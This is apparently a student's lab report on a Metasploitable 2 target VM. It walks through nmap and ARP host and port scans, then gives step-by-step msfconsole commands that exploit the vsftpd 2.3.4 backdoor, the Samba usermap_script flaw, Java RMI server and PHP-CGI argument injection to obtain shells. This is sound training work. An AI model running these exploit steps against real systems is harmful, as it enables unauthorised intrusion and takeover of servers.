gaoyiming  

1. 实验内容

  • (1)学会使用metasploit,并学会对靶机进行主机发现、端口扫描、漏洞扫描等操作

  • (2)学会利用Vsftpd源码包后门漏洞(21端口)

  • (3)学会利用SambaMS-RPC Shell命令注入漏洞(端口139)

  • (4)学会利用Java RMI SERVER命令执行漏洞(1099端口)

  • (5)学会利用PHP CGI参数执行注入漏洞(80端口)

2. 实验要求

  • 能够熟练进行metasploit上的操作,熟练nmap扫描操作,并且通过漏洞发现能够利用不同漏洞实现攻击

3. 实验过程

3.1 环境准备

  • kali虚拟机作为攻击机

  • 本次实验需要在linux上安装metasploit,首先在win上安装metasploit安装包,然后根据安装教程在vmware上安装好靶机

3.2 前期渗透

  • 首先需要在靶机上使用ifconfig查看一下靶机ip:192.168.217.150

image

  • (1)主机发现,在kali中输入msfconsole打开msfconsole控制台,输入以下命令后,可以发现靶机在线
    search arp_sweep:搜索arp_sweep模块,用于通过arp协议扫描网段内的活跃主机
    use 0:选择搜索结果中第一个arp_sweep模块
    set RHOSTS 192.168.217.0/24:扫描靶机网段内的所有ip地址
    run:运行

image

  • (2)端口扫描,输入nmap -p 1-2048 192.168.217.150扫描靶机1到2048中开放的端口如下

image

  • (3)系统版本、漏洞扫描,输入nmap -script=vuln 192.168.217.150对靶机的系统漏洞进行扫描,能够发现一些端口存在漏洞,比如21端口的vsFTPd版本2.3.4存在后门等

image

3.3 Vsftpd源码包后门漏洞(21端口)

  • 该漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以:)为结尾,会调用一个vsf_sysutil_extra()函数,进而攻击者可通过该后门在目标主机6200端口获取root权限的shell,完全控制服务器

  • 利用该漏洞的步骤:
    (1)输入msfconsole打开msfconsole控制台
    (2)输入use exploit/unix/ftp/vsftpd_234_backdoor,用于选择vsFTPd2.3.4后门的漏洞模块
    (3)输入set RHOSTS 192.168.217.150,对靶机地址进行攻击
    (4)输入run,运行该模块

image

3.4 SambaMS-RPC Shell命令注入漏洞(端口139)

  • 该漏洞原理:Samba处理用户输入时未进行过滤shell元字符,恶意的输入通过MS-RPC调用传递给/bin/sh执行,使攻击者以nobody用户的权限执行任意命令

  • 利用该漏洞的步骤:
    (1)输入msfconsole打开msfconsole控制台
    (2)输入use exploit/multi/samba/usermap_script用于选择samba漏洞模块
    (3)输入set RHOST 192.168.217.150,对靶机地址进行攻击
    (4)输入exploit执行漏洞

image

3.5 Java RMI SERVER命令执行漏洞(1099端口)

  • 该漏洞原理:攻击者可构造恶意RMI请求,让目标服务加载并执行包含恶意代码的类文件,从而注入shell命令并获取系统控制权

  • 利用该漏洞的步骤:
    (1)输入nmap -p 1099 192.168.217.150,首先查看1099端口是否打开
    (2)输入msfconsole打开msfconsole控制台
    (3)输入use exploit/multi/misc/java_rmi_server,用于选择java rmi server漏洞模块
    (4)输入set RHOST 192.168.217.150,对靶机地址进行攻击
    (5)输入show options,展示配置参数

image

(6)输入exploit执行漏洞
(7)输入shell获得靶机shell

image

3.6 PHP CGI参数执行注入漏洞(80端口)

  • 该漏洞原理:PHP CGI模式下处理http请求时,当URL中包含%2d%64(-d)、%2d%6f(-o)等URL编码后的php命令行参数时,PHP-CGI会将其当作命令行选项解析,而不是http请求参数,因此攻击者可通过构造特殊URL在请求参数中插入执行命令

  • 利用该漏洞的步骤:
    (1)输入msfconsole打开msfconsole控制台
    (2)输入use exploit/multi/http/php_cgi_arg_injection,用于选择php_cgi_arg_injection漏洞模块
    (3)输入set RHOST 192.168.217.150,对靶机地址进行攻击
    (4)输入exploit执行漏洞
    (5)输入shell获得靶机shell

image

4. 问题及解决方案

  • 暂无

5. 学习感悟、思考等

本次实验我学习了Metasploit攻击渗透实践,学习的内容有:使用nmap进行主机发现、端口扫描与漏洞扫描的原理和方法、使用msf对漏洞发现的结果进行利用。通过实践过程中的学习,我对metasploit攻击渗透和nmap的扫描功能的了解有很大的提升。
本次实践步骤较为简单,但是这也说明了实践的原理是更为重要的,我们不能机械地只依靠指导书,而是需要弄清为什么要做这一步才去做,这样对我们才是有意义的实践。
最后我发现其实漏洞无处不在,关键是在于防范和保护的方法,这也更加激励我要学好专业知识,才能让自己学有所用,学有所成。

参考资料

Metasploitable虚拟机2下载链接

来自Rapid7官网的本实验的指导书

posted on 2025-11-21 22:16  20232405高一鸣  阅读(4)  评论(0)    收藏  举报